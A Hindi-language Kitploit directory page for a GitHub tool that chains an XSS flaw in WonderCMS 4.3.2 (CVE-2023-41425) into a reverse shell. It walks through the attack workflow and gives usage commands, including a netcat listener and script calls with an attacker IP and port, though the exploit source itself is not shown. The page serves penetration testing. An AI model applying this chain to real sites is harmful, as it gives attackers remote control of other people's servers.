Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425 — CVE-2023-41425 Refurbish | Kitploit
उपकरण/GitHubGitHub/0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425
पेलोड जनरेशनशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHub0xdtc/wondercms-4.3.2-xss-to-rce-exploits-cve-2023-41425

WonderCMS-4.3.2-XSS-to-RCE-Exploits-CVE-2023-41425

CVE-2023-41425 Refurbish

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
31 साल पहलेअभी तक समीक्षित नहीं
साझा करें

WonderCMS 4.3.2 XSS से RCE शोषण

अवलोकन

ये स्क्रिप्ट WonderCMS 4.3.2 में XSS (क्रॉस-साइट स्क्रिप्टिंग) भेद्यता का शोषण करके रिमोट कोड निष्पादन (RCE) प्राप्त करती हैं। XSS पेलोड, जब व्यवस्थापक द्वारा ट्रिगर किया जाता है, तो एक क्राफ्टेड दुर्भावनापूर्ण थीम मॉड्यूल का लाभ उठाकर लक्ष्य सर्वर पर स्वचालित रूप से एक रिवर्स शेल स्थापित करता है। रिवर्स शेल revshells.com से प्राप्त किया जाता है और निष्पादित किया जाता है, जिससे हमलावर को सर्वर पर दूरस्थ पहुँच मिल जाती है।


सामग्री तालिका

  • पूर्वापेक्षाएँ
  • स्क्रिप्ट 1: स्वचालित शोषण
    • विशेषताएँ
    • उपयोग
  • स्क्रिप्ट 2: मैन्युअल शोषण
    • विशेषताएँ
    • उपयोग
  • नोट्स
  • लाइसेंस

पूर्वापेक्षाएँ

किसी भी स्क्रिप्ट को सफलतापूर्वक चलाने के लिए, निम्नलिखित उपकरण और शर्तें आवश्यक हैं:

  • Bash शेल: दोनों स्क्रिप्ट Bash शेल का उपयोग करके Linux वातावरण के लिए लिखी गई हैं।
  • netcat (nc): रिवर्स शेल कनेक्शन सुनने के लिए उपयोग किया जाता है।
  • Python3: XSS पेलोड को होस्ट करने के लिए एक सरल Python HTTP सर्वर का उपयोग किया जाता है।
  • WonderCMS 4.3.2: लक्ष्य WonderCMS के एक भेद्य संस्करण पर चल रहा होना चाहिए।
  • व्यवस्थापक का इंटरैक्शन: पेलोड को XSS ट्रिगर करने के लिए एक व्यवस्थापक की आवश्यकता होती है, जिसके परिणामस्वरूप रिवर्स शेल निष्पादित होता है।
  • revshells.com: रिवर्स शेल पेलोड revshells.com से गतिशील रूप से डाउनलोड किया जाता है।

  • स्क्रिप्ट 1: स्वचालित शोषण

    POC

    Pasted image 20241010021603

    विशेषताएँ

    शोषण का यह संस्करण स्वचालित रूप से एक सक्रिय nc लिसनर की जाँच करता है, रिवर्स शेल डाउनलोड करता है, HTTP सर्वर शुरू करता है, पेलोड भेजता है, और व्यवस्थापक द्वारा रिवर्स शेल ट्रिगर करने की प्रतीक्षा करता है।

    • स्वचालित रिवर्स शेल सेटअप: revshells.com से एक पूर्व-निर्मित रिवर्स शेल डाउनलोड करता है।
    • XSS पेलोड इंजेक्शन: लक्ष्य के संपर्क फ़ॉर्म में एक XSS पेलोड इंजेक्ट करता है।
    • HTTP सर्वर प्रबंधन: रिवर्स शेल पेलोड को होस्ट करने के लिए स्वचालित रूप से एक Python HTTP सर्वर शुरू करता है।
    • nc लिसनर जाँच: आगे बढ़ने से पहले सुनिश्चित करता है कि लिसनर चल रहा है।
    • पेलोड स्वचालित भेजना: उपयोगकर्ता के हस्तक्षेप के बिना स्वचालित रूप से पेलोड भेजता है।

    उपयोग

    1. सुनिश्चित करें कि nc लिसनर निर्दिष्ट पोर्ट पर चल रहा है:
      root@kitploit:~
      nc -nvlp <PORT>
      
    2. निम्नलिखित कमांड के साथ स्क्रिप्ट चलाएँ:
      root@kitploit:~
      ./AUTO_CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
      
      उदाहरण:
      root@kitploit:~
      ./AUTO_CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
      

    कार्यप्रवाह

    1. रिवर्स शेल डाउनलोड करें: स्क्रिप्ट revshells.com से रिवर्स शेल डाउनलोड करती है।
    2. रिवर्स शेल को संशोधित करें: रिवर्स शेल स्क्रिप्ट को हमलावर के IP और पोर्ट के साथ अपडेट किया जाता है।
    3. ZIP पेलोड बनाएँ: एक ZIP फ़ाइल बनाई जाती है जिसमें रिवर्स शेल होता है।
    4. XSS पेलोड तैयार करें: एक XSS पेलोड उत्पन्न किया जाता है जो रिवर्स शेल स्थापित करता है, और इसे भेद्य संपर्क फ़ॉर्म में इंजेक्ट किया जाता है।
    5. HTTP सर्वर स्वचालित रूप से प्रारंभ करें: स्क्रिप्ट दुर्भावनापूर्ण पेलोड को सर्व करने के लिए एक Python HTTP सर्वर शुरू करती है।
    6. पेलोड स्वचालित रूप से भेजें: XSS पेलोड स्वचालित रूप से व्यवस्थापक को भेजा जाता है।

    स्क्रिप्ट 2: मैन्युअल शोषण

    POC

    Pasted image 20241010013048

    स्क्रिप्ट द्वारा प्रदान किए गए शोषण का उपयोग वेबसाइट फ़ील्ड में करें...

    Pasted image 20241010013218

    विशेषताएँ

    इस संस्करण में उपयोगकर्ता को मैन्युअल रूप से nc लिसनर और XSS पेलोड ट्रिगरिंग का प्रबंधन करना होता है। यह उन परिदृश्यों के लिए अधिक उपयुक्त है जहाँ स्वचालित प्रक्रियाएँ वांछनीय नहीं हैं।

    • मैन्युअल रिवर्स शेल सेटअप: लिसनर के चलने को सुनिश्चित करने की जिम्मेदारी उपयोगकर्ता की होती है।
    • मैन्युअल XSS ट्रिगरिंग: स्क्रिप्ट व्यवस्थापक को भेजे जाने वाले दुर्भावनापूर्ण लिंक प्रदान करती है, लेकिन पेलोड को मैन्युअल रूप से ट्रिगर किया जाना चाहिए।
    • HTTP सर्वर प्रबंधन: XSS पेलोड को होस्ट करने के लिए एक Python HTTP सर्वर शुरू करता है।

    उपयोग

    1. सुनिश्चित करें कि nc लिसनर निर्दिष्ट पोर्ट पर चल रहा है:
      root@kitploit:~
      nc -nvlp <PORT>
      
    2. निम्नलिखित कमांड के साथ स्क्रिप्ट चलाएँ:
      root@kitploit:~
      ./CVE-2023-41425 <loginURL> <attacker_IP> <attacker_PORT>
      
      उदाहरण:
      root@kitploit:~
      ./CVE-2023-41425 http://localhost/loginURL 192.168.29.165 5252
      

    कार्यप्रवाह

    1. रिवर्स शेल डाउनलोड करें: revshells.com से एक रिवर्स शेल डाउनलोड करता है।
    2. रिवर्स शेल को संशोधित करें: रिवर्स शेल को हमलावर के IP और पोर्ट के साथ अपडेट करता है।
    3. ZIP पेलोड बनाएँ: एक ZIP फ़ाइल बनाता है जिसमें रिवर्स शेल होता है।
    4. XSS पेलोड तैयार करें: एक XSS पेलोड उत्पन्न करता है जो रिवर्स शेल स्थापित करता है।
    5. दुर्भावनापूर्ण लिंक प्रदर्शित करें: वह लिंक प्रदर्शित करता है जिसे ट्रिगर करने के लिए व्यवस्थापक को भेजा जाना चाहिए।
    6. HTTP सर्वर प्रारंभ करें: पेलोड को होस्ट करने के लिए एक Python HTTP सर्वर शुरू करता है।

    नोट्स

    • व्यवस्थापक का इंटरैक्शन: दोनों शोषण WonderCMS व्यवस्थापक द्वारा भेद्य पृष्ठ पर जाकर XSS पेलोड को ट्रिगर करने पर निर्भर करते हैं। एक बार ट्रिगर होने पर, हमलावर की मशीन के साथ रिवर्स शेल स्थापित हो जाता है।
    • फ़ायरवॉल/IDS/IPS: फ़ायरवॉल या घुसपैठ का पता लगाने वाली प्रणालियों (IDS) द्वारा संरक्षित वातावरणों में इन शोषणों को चलाते समय सावधानी बरतें, क्योंकि वे संदिग्ध गतिविधि को अवरुद्ध या अलर्ट कर सकते हैं।
    • जिम्मेदार प्रकटीकरण: यदि आप पाते हैं कि कोई लक्ष्य भेद्य है, तो हमेशा नैतिक दिशानिर्देशों का पालन करें और उपयुक्त पक्षों को भेद्यता की रिपोर्ट करें।
    टूल डाउनलोड करें